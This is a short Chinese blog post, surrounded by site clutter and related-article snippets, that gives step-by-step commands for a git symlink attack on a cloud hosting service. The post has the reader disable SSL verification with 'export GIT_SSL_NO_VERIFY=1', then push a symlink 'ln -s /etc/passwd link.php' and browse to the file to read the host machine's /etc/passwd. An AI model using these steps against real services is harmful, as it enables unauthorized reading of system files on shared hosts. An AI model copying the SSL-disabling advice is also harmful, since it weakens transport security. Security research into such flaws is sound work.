git 漏洞导致任意文件读取

最新推荐文章于 2024-09-17 17:58:48 发布

heayin123

最新推荐文章于 2024-09-17 17:58:48 发布

阅读量2.2k

点赞数

分类专栏： web安全

本文链接：https://blog.csdn.net/u012684933/article/details/41845021

版权

web安全专栏收录该内容

34 篇文章 2 订阅

订阅专栏

相关链接如下：

http://zone.wooyun.org/content/17131

漏洞利用，

1. 在某云服务上，创建一个web php应用

2. 将服务器上的代码git到本地:

这步可能报错，如果报如下错误：

需要修改下当前用户的.bashrc文件，加上如下内容：

export GIT_SSL_NO_VERIFY=1

保存文件后，执行：source ~/.bashrc

3.进入下载的代码目录，ln -s /etc/passwd link.php

4. git add link.php

5.git commit -m "add file"

6. git push

7. 访问云服务上的link.php，就可以看到云服务宿主主机的/etc/passwd文件的内容了

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

heayin123

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

git信息泄露漏洞

m0_52587327的博客

04-21

3944

目录git信息泄露漏洞危害git介绍确定是否存在泄露获取漏洞的源码GitHack使用例题buu [GXYCTF2019]禁止套娃后记学习参考 git信息泄露漏洞当前大量开发人员使用git进行版本控制，对站点自动部署。如果配置不当，可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。危害攻击者可以利用该漏洞下载git文件夹里的所有内容。如果文件夹内有敏感信息比如站点源码、数据库账户密码等，攻击者可能直接控制服务器。 git介绍参考https://blog.csdn.net/xy_su

Mysql任意文件读取漏洞

神隐哥的博客

03-02

1037

实现原理：攻击者搭建一个伪造的mysql服务器，当有用户去连接上这个伪造的服务器时。攻击者就可以任意读取受害者的文件内容。具体可以去看下Mysql连接时的流量。会有一个load_file命令。因为我们是服务端。可以自定义这个命令。就实现了任意文件读取。具体原理参考：https://cloud.tencent.com/developer/article/1426503实验一用到的工具：https://github.com/allyshka/Rogue-MySql-Server.git 这里用到两台

参与评论您还未登录，请先登录后发表或查看评论

git泄露

2401_82388450的博客

04-16

2435

git log --pretty=oneline //加参，简洁查看$ git reflog //查看每一次修改历史$ cat test.txt //查看文件内容$ git status //查看工作区中文件当前状态。

网站存在Git漏洞-使用GitHack得到网站源代码

m0_74313947的博客

09-06

290

下载完成，进入GitHack的dict目录。再使用GitHack下载.git文件。以ctfhub靶场为例，git泄漏。扫描到.git目录存在git泄漏。首先使用dirsearch扫描。使用PowerShell。

Git泄露

cyy001128的博客

04-23

2014

通过git stash存储的修改列表，可以通过git stash list查看，git stash show用于校验，git stash apply用于重新存储，直接执行git stash等同于git stash save，执行 git stash pop 是恢复文件。前几步大致相同，都是用dirsearch扫描是否存在git漏洞，然后打开githack连接，后面则是分为git log，git stash和git index几种。用git reset --hard 回退版本，打开文件夹可找到flag。

任意文件读取漏洞小记

weixin_37104668的博客

09-12

1104

漏洞介绍很多网站由于业务需求，往往需要提供文件(附件)下载的功能块，但是如果对下载的文件没有做限制，直接通过绝对路径对其文件进行下载，那么，恶意用户就可以利用这种方式下载服务器的敏感文件，对服务器进行进一步的威胁和攻击。漏洞存在的地方系统中存在文件(附件/文档/图片等等资源)下载的地方。任意文件读取常见参数名： &RealPath= &FilePath= &file= &filename= &Path= &path= &inputFile= &

.git 获取git中代码漏洞修复

顽石的专栏

09-25

2067

1. 简介 GitHack 是一个.git泄露利用脚本，利用此漏洞可以下载到目标git中的代码，工作原理如下: 解析.git/index文件，找到工程中所有的： ( 文件名，文件sha1 ) 去.git/objects/ 文件夹下下载对应的文件 zlib解压文件，按原始的目录结构写入源代码 2. 下载 GitHack 下载地址: https://github.com/lijiejie/GitHa

web网站的任意文件上传下载漏洞解析

最新发布

CoffeMilk的博客

09-17

1298

大部分的Web网站都拥有文件上传文件的接口（允许上传图片、视频、头像、文档等其他类型的文件到服务器上）；但是如果Web网站的开发人员并没有对上传的文件相关参数、内容信息进行严格的过滤防护，未对安全进行考虑；那么攻击者就可以通过一些方法将恶意文件上传到服务器上，然后通过上传的恶意文件来访问甚至控制整个服务器。一般来说攻击者上传的恶意文件被称为网页后门（即WebShell）是一种木马程序,该后门的功能非常强大（可以进行查看服务器目录、服务器文件、执行系统命令、拉取或删除服务器文件等操作）。

ffmpeg ，结合 SSRF任意文件读取漏洞

weixin_41438728的博客

09-29

1399

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录前言一、pandas是什么？二、使用步骤1.引入库2.读入数据总结欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入

GitLab任意文件读取漏洞复现(CVE-2020-10977)

m0_48520508的博客

12-30

2248

0x00简介 GitLab 是一个用于仓库管理系统的开源项目，使用Git作为代码管理工具，并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发，使用MIT许可证的基于网络的Git仓库管理工具，且具有wiki和issue跟踪功能。使用Git作为代码管理工具，并在此基础上搭建起来的web服务。 0x01漏洞概述在Gitlab 8.5-12.9版本中，存在一处任意文件读取漏洞，攻击者可以利用该漏洞，在不需要特权的状态下，读取任意文件，造成严重信息泄露，从而导致进一步被攻击的风险。 0x02

GitLab任意文件读取漏洞(CVE-2020-10977)POC

01-15

检测脚本

git泄露查询

10-31

对github的泄露信息进行检索查询，可以用于信息收集，资产探测。

github-actions-gitleaks:我们自己的gitleaks动作

03-26

GitHub动作：Gitleaks 使用Gitleaks简化了Github动作。工作流程示例 name: Gitleaks on: push jobs: snyk: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - name: Run Gitleaks uses: eeveebank/github-actions-gitleaks@v1.0.0 with: depth: 1 - uses: github/codeql-action/upload-sarif@v1 with: sarif_file: gitleaks.sarif

gitleaks：使用正则表达式和熵扫描git仓库（或文件）以查找机密:key:

02-04

Gitleaks是一个SAST工具，用于检测git repos中的硬编码机密，例如密码，api密钥和令牌。 Gitleaks的目标是成为一种易于使用的多合一解决方案，用于在您的代码中查找过去或现在的秘密。特征：扫描秘密扫描未机密，作为向左转移安全性的一部分扫描可用的通过toml配置的使用高性能 JSON，SARIF和CSV报告使用基于密钥或密码的身份验证进行私人仓库扫描安装 Gitleaks可以与Homebrew，Docker和Go一起安装。 Gitleaks也可以从以二进制形式用于许多流行的平台和OS类型。苹果系统 brew install gitleaks 码头工人

开源项目-zricethezav-gitleaks.zip

09-03

开源项目-zricethezav-gitleaks.zip,Search Git history for secrets (faster than truffleHog)

git泄露漏洞总结

weixin_66839513的博客

04-02

3118

Git泄露是指在使用Git版本控制系统时，由于配置不当或者操作失误，导致敏感信息（如密码、密钥、源代码等）被意外地上传到公开的代码仓库或者其他公开可访问的地方，从而被未授权的人获取到。

新型任意文件读取漏洞的研究

weixin_34187822的博客

03-08

981

phith0n · 2015/03/04 9:210x00 前言早前发现boooom在乌云上发了很多个任意文件读取的漏洞，都是形如http://target/../../../../etc/passwd 复制代码这样。当时感觉很新奇，因为正常情况下，通常的服务器中间件是不允许直接读取web目录以外的文件的，为什么这样的漏洞却出现在了很多案例中。后来在lijiejie的文章给出了解释：www.lij...

Git漏洞允许任意代码执行(CVE-2018-17456)复现

weixin_30405421的博客

10-23

482

Git漏洞允许任意代码执行(CVE-2018-17456) 国外安全研究员 joernchen 在 9 月 23 日向 git 官方报告了漏洞的相关细节。10月5日，Git项目披露了一个漏洞，编号为CVE-2018-17456。当用户克隆恶意存储库时，该漏洞可能会导致执行任意代码。漏洞描述这个漏洞已被分配 CVE-2018-17456 这个唯一 ID，与之前的 CVE-2017-10001...

Android Studio Git删除远程仓库文件/文件夹教程

"如何在Android Studio中使用Git删除远程仓库中的文件或文件夹" 在使用Android Studio进行项目开发时，我们可能会遇到需要从Git远程仓库中删除已上传的文件或文件夹的情况。以下是一个详细的步骤指南，帮助你了解...